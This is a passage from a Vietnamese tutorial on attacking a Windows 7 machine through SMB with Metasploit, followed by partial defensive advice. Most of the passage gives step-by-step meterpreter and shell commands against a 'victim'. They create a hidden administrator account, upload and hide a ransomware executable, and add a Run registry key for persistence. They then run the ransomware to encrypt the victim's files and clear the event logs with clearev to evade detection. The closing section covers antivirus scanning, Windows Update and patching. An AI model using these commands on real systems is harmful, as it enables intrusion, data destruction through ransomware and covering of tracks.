. Ở chế độ này, hacker có thể thực hiện các câu lệnh trên Command Prompt [CMD] như trên máy local. [Để quay lại meterpreter > ta chỉ cần gõ lệnh exit].
– Gõ lệnh # net user để xem tài khoản người dùng đang có trên máy victim. Như hình dưới ta thấy máy nạn nhân có một tài khoản admin thuộc nhóm Administrator.
– Tiếp tục dùng 02 lệnh sau để tạo tài khoản người dùng mới:
net user minhdao Minhdao123 /add
net localgroup administrators minhdao /add
Kết quả.
- Upload và chạy virus lên máy victim.
- \> Upload virus: # upload /root/Desktop/ransomware.exe C:/Windows
* Lưu ý: Lúc này ta đang ở chế độ exploit của Metasploit. [ meterpreter > ]
Check thử bên máy victim.
- \> Gán thuộc tính ẩn [Hidden], chỉ đọc [Read-only] và hệ thống [Systems] cho virus.
– Gõ # shell sau đó gõ: # attrib +R +S +H C:\Windows\ransomware.exe
Hình sau khi gán thuộc tính.
- \> Tạo một khoá khởi động trong Registry. VD: test
# reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v test /t REG_SZ /d C:\Windows\ransomware.exe
Kiểm tra Registry bên máy victim thấy khoá đã tạo thành công.
- Chạy trực tiếp virus hoặc file exe, bat… từ máy victim.
– Ví dụ ta chạy file virus mã hoá file ransomware.exe vừa upload sang máy nạn nhân lúc trước tại đường dẫn: C:\Windows. [Ta thực hiện câu lệnh start ở chế độ shell].
# start /B C:\Windows\ransomware.exe
Dữ liệu bên máy nạn nhân đã bị mã hoá khi chạy virus.
Thư mục Documents ở ổ đĩa D:\Documents.
- Xoá log của hệ thống.
– Thông thường Windows sẽ ghi lại nhật kí, sự kiện mỗi khi có sự thay đổi nào đó. Vì vậy khi hacker tấn công họ sẽ cố tình xoá log nhằm tránh bị phát hiện. Để xoá log máy victim ta dùng lệnh: # clearev ở môi trường exploit của Metasploit.
Log của Windows trên máy victim trước khi xoá.
Sau khi xoá log bằng lệnh # clearev
- CÁCH PHÒNG CHỐNG.
– Để tránh bị khai thác và lợi dụng giao thức SMB. Ta cần thực hiện một số công việc sau:
Máy tính đã bị nhiễm virus nên trước tiên chúng ta phải quét sạch virus mới sử dụng những hướng dẫn vá lỗi bên dưới. Chúng ta có thể dùng phần mềm virus Kaspersky miễn phí 30 ngày để quét toàn bộ máy tính.
Download Kaspersky Miễn Phí 30 ngày
Sau khi download phần mềm kaspersky về tiến hành cài đặt và diệt toàn bộ máy. Lưu ý: - Tùy theo tốc độ mạng, dữ liệu, cấu hình máy tính đang sử dụng mà thời gian cài kaspersky và diệt virus máy tính có thể mất thời gian 1-2h thậm chí nhiều hơn. - Một số máy bị nhiễm virus sau khi diệt virus xong có thể lỗi file hệ thống dẫn đến lỗi windows. Khuyến khích: Tiến hành sao lưu dữ liệu trên Desktop, My documents, ổ C sang ổ D hoặc E,F… rồi tiến hành cài windows 7 mới rồi tiếp theo thực hiện những bước sau.
1. Kiểm tra Windows Update đã được bật lên chưa
Sau khi cài đặt xong windown 7 mới chúng ta lần lược thao tác các bước sau: - Mở hộp thoại Run dùng tổ hợp phím "Windows + R". - Gõ lệnh services.msc và bấm phím “Enter” - Tìm đến dòng service Windows Update -> click đúp chuột. - Ở "Startup type" chọn "Automatic" -> "Apply". - Click "Start" -> "OK".
- Nếu ở "Startup type" trong service Windows Update đã được bật ở trạng thái "Automatic" thì bỏ qua bước này nhé.
2. Tải về file sửa lỗi từ Microsoft và cài đặt
Dưới đây là đường link của 2 phiên bản Windows 7 được vá lỗi. Nếu không chắc về phiên bản sử dụng là 32-bit hay 64-bit, chúng ta có thể tải cả 2 bản vá cùng lúc và cài đặt trên Windows máy tính đang sử dụng. Nếu lỡ như sai phiên bản thì cũng không gây hại gì cho máy tính của chúng ta.